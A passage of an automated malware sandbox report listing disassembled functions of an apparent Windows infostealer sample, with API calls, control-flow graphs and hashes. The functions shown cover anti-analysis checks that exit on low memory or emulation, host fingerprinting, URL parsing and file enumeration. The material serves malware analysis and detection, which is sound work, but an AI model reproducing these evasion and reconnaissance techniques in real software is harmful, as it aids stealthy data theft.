                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 7a6fb696d9192006034c366d7c587a5ac2ebbcbc70648c211b23d8f612dd3389
                                • Instruction ID: 1d0422eb3f01d10e511988b3d6bb2b6de5733e49df0b4380bd6d33cb211e758d
                                • Opcode Fuzzy Hash: 7a6fb696d9192006034c366d7c587a5ac2ebbcbc70648c211b23d8f612dd3389
                                • Instruction Fuzzy Hash: 925192B0A04782DBDB209F7ADD84A2B7BF4BF14706B10485EE58AD2761DF7CD4418B19
                                Function 004F2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 4f2740-4f2783 GetWindowsDirectoryA 2783 4f278c-4f27ea GetVolumeInformationA 2782->2783 2784 4f2785 2782->2784 2785 4f27ec-4f27f2 2783->2785 2784->2783 2786 4f2809-4f2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 4f27f4-4f2807 2785->2787 2788 4f2826-4f2844 wsprintfA 2786->2788 2789 4f2822-4f2824 2786->2789 2787->2785 2790 4f285b-4f2872 call 4f71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 004F277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004E93B6,00000000,00000000,00000000,00000000), ref: 004F27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2816
                                • wsprintfA.USER32 ref: 004F283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 3b8a43bcd0964ca1f6fa24311dbce568bf4faad042796ad5f63d980754678aa7
                                • Instruction ID: b5a0d6c1bbb2bbdf9ed33d3a2ec05d4635279d8aed5fbf0132998a359049c128
                                • Opcode Fuzzy Hash: 3b8a43bcd0964ca1f6fa24311dbce568bf4faad042796ad5f63d980754678aa7
                                • Instruction Fuzzy Hash: 8A3176B1D042099BCB04DFB88A859EFFFBCEF58750F10416AE505F7650E6789A4087A6
                                Function 004D4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 4d4bc0-4d4bce 2794 4d4bd0-4d4bd5 2793->2794 2794->2794 2795 4d4bd7-4d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 4d2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 004D4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004D4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004D4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 004D4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 004D4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: e68a85b3f2c494513e131ac44342e0270a0bdaf68382829554fe7d17f7d9581f
                                • Instruction ID: 0560c946108b28da1727af2c004090d72feb12cb8f34a6ce14345b7550879ff6
                                • Opcode Fuzzy Hash: e68a85b3f2c494513e131ac44342e0270a0bdaf68382829554fe7d17f7d9581f
                                • Instruction Fuzzy Hash: 1B011B71D00218ABDB50DFA9EC45B9EBBA8EB58324F00812AF954E7390DF7459058BD5
                                Function 004D1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 4d1030-4d1055 GetCurrentProcess VirtualAllocExNuma 2799 4d105e-4d107b VirtualAlloc 2798->2799 2800 4d1057-4d1058 ExitProcess 2798->2800 2801 4d107d-4d1080 2799->2801 2802 4d1082-4d1088 2799->2802 2801->2802 2803 4d108a-4d10ab VirtualFree 2802->2803 2804 4d10b1-4d10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004D1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 004D104D
                                • ExitProcess.KERNEL32 ref: 004D1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004D106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004D10AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: b0b24f8f631bb5b57ee9b802a230fc9a6da5955babe1c31717ba3b636d5b9e84
                                • Instruction ID: 473b64032df6601e915323a773b0f4e4211c86b610de55f61ba0fb8b0030a3cb
                                • Opcode Fuzzy Hash: b0b24f8f631bb5b57ee9b802a230fc9a6da5955babe1c31717ba3b636d5b9e84
                                • Instruction Fuzzy Hash: B101D171780204BBE7205A656C1AF6B77A9A785B01F208116FB44E7390DDB9E9008668
                                Function 004EEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 4eee90-4eeeb5 call 4d2930 2808 4eeec9-4eeecd call 4d6c40 2805->2808 2809 4eeeb7-4eeebf 2805->2809 2812 4eeed2-4eeee8 StrCmpCA 2808->2812 2809->2808 2810 4eeec1-4eeec3 lstrcpy 2809->2810 2810->2808 2813 4eeeea-4eef02 call 4d2a20 call 4d2930 2812->2813 2814 4eef11-4eef18 call 4d2a20 2812->2814 2824 4eef04-4eef0c 2813->2824 2825 4eef45-4eefa0 call 4d2a20 * 10 2813->2825 2819 4eef20-4eef28 2814->2819 2819->2819 2821 4eef2a-4eef37 call 4d2930 2819->2821 2821->2825 2830 4eef39 2821->2830 2824->2825 2826 4eef0e-4eef0f 2824->2826 2829 4eef3e-4eef3f lstrcpy 2826->2829 2829->2825 2830->2829
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 004EEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: b6a6924add9ad6d92c40b8a4425cc57aef110ddf2587e338f4174c41d2dafe42
                                • Instruction ID: f99ff4a4842b045ca9bb237f9182710aa8672ba2967e8069b10e95160d0dc6ec
                                • Opcode Fuzzy Hash: b6a6924add9ad6d92c40b8a4425cc57aef110ddf2587e338f4174c41d2dafe42
                                • Instruction Fuzzy Hash: F42110707201559BCB21FF7BD95579B37A4EF20305F00556BF84ADB352DA78E8008B98
                                Function 004D10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 4d10c0-4d10cb 2887 4d10d0-4d10dc 2886->2887 2889 4d10de-4d10f3 GlobalMemoryStatusEx 2887->2889 2890 4d10f5-4d1106 2889->2890 2891 4d1112-4d1114 ExitProcess 2889->2891 2892 4d1108 2890->2892 2893 4d111a-4d111d 2890->2893 2892->2891 2894 4d110a-4d1110 2892->2894 2894->2891 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 36753c84dbab4931d5720295d7c8ec9ea04ffffda9ed240e44f4d5a41d542dd5
                                • Instruction ID: e86933a9ef870031b3f2cf6255a6a7e8718038f0019bf9a1eb63664922c9561f
                                • Opcode Fuzzy Hash: 36753c84dbab4931d5720295d7c8ec9ea04ffffda9ed240e44f4d5a41d542dd5
                                • Instruction Fuzzy Hash: 2BF02E70104245A7E7107A64D92531EF7D8E705350F10852BDED6C27A2E638C880816F
                                Function 004E8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 4e8c88-4e8cc4 StrCmpCA 2898 4e8ccd-4e8ce6 2895->2898 2899 4e8cc6-4e8cc7 ExitProcess 2895->2899 2901 4e8cec-4e8cf1 2898->2901 2902 4e8ee2-4e8eef call 4d2a20 2898->2902 2903 4e8cf6-4e8cf9 2901->2903 2905 4e8cff 2903->2905 2906 4e8ec3-4e8edc 2903->2906 2908 4e8e6f-4e8e7d StrCmpCA 2905->2908 2909 4e8e88-4e8e9a lstrlen 2905->2909 2910 4e8d06-4e8d15 lstrlen 2905->2910 2911 4e8d84-4e8d92 StrCmpCA 2905->2911 2912 4e8da4-4e8db8 StrCmpCA 2905->2912 2913 4e8dbd-4e8dcb StrCmpCA 2905->2913 2914 4e8ddd-4e8deb StrCmpCA 2905->2914 2915 4e8dfd-4e8e0b StrCmpCA 2905->2915 2916 4e8e1d-4e8e2b StrCmpCA 2905->2916 2917 4e8e3d-4e8e4b StrCmpCA 2905->2917 2918 4e8d5a-4e8d69 lstrlen 2905->2918 2919 4e8e56-4e8e64 StrCmpCA 2905->2919 2920 4e8d30-4e8d3f lstrlen 2905->2920 2906->2902 2946 4e8cf3 2906->2946 2908->2906 2930 4e8e7f-4e8e86 2908->2930 2931 4e8e9c-4e8ea1 call 4d2a20 2909->2931 2932 4e8ea4-4e8eb0 call 4d2930 2909->2932 2926 4e8d1f-4e8d2b call 4d2930 2910->2926 2927 4e8d17-4e8d1c call 4d2a20 2910->2927 2911->2906 2921 4e8d98-4e8d9f 2911->2921 2912->2906 2913->2906 2922 4e8dd1-4e8dd8 2913->2922 2914->2906 2923 4e8df1-4e8df8 2914->2923 2915->2906 2924 4e8e11-4e8e18 2915->2924 2916->2906 2925 4e8e31-4e8e38 2916->2925 2917->2906 2928 4e8e4d-4e8e54 2917->2928 2935 4e8d6b-4e8d70 call 4d2a20 2918->2935 2936 4e8d73-4e8d7f call 4d2930 2918->2936 2919->2906 2929 4e8e66-4e8e6d 2919->2929 2933 4e8d49-4e8d55 call 4d2930 2920->2933 2934 4e8d41-4e8d46 call 4d2a20 2920->2934 2921->2906 2922->2906 2923->2906 2924->2906 2925->2906 2955 4e8eb3-4e8eb5 2926->2955 2927->2926 2928->2906 2929->2906 2930->2906 2931->2932 2932->2955 2933->2955 2934->2933 2935->2936 2936->2955 2946->2903 2955->2906 2956 4e8eb7-4e8eb9 2955->2956 2956->2906 2957 4e8ebb-4e8ebd lstrcpy 2956->2957 2957->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 8261b34522078203a8366949c7f46665b3e993cf086df5a6b46d0fb2ca96cf90
                                • Instruction ID: 841d6108cd2207435fa4d76e6c82831ed1acaea00e097f1d581a6f457579d0a2
                                • Opcode Fuzzy Hash: 8261b34522078203a8366949c7f46665b3e993cf086df5a6b46d0fb2ca96cf90
                                • Instruction Fuzzy Hash: BEE0D860100345EBDB249BB5CC94D57BBACBF84700700C52DB68A53291DF24AC00C75C
                                Function 004F2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2958 4f2ad0-4f2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 4f2b44-4f2b59 2958->2959 2960 4f2b24-4f2b36 2958->2960
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 004F2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 01b1e101cdbc6f4c7a2599553800a2f780af285c66396a0ec79440abf4d7bcd2
                                • Instruction ID: c23917a118f5fe3d1472ba7e0c537537942821b99c033e1acfbc0e73048d08ab
                                • Opcode Fuzzy Hash: 01b1e101cdbc6f4c7a2599553800a2f780af285c66396a0ec79440abf4d7bcd2
                                • Instruction Fuzzy Hash: EC0126B2A40208EBD710CF98EC45BAEF7B8F704B21F00422AFE09D3780D778190087A5

                                Non-executed Functions

                                Function 004E2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E2402
                                • lstrlen.KERNEL32(\*.*), ref: 004E240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 004E2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
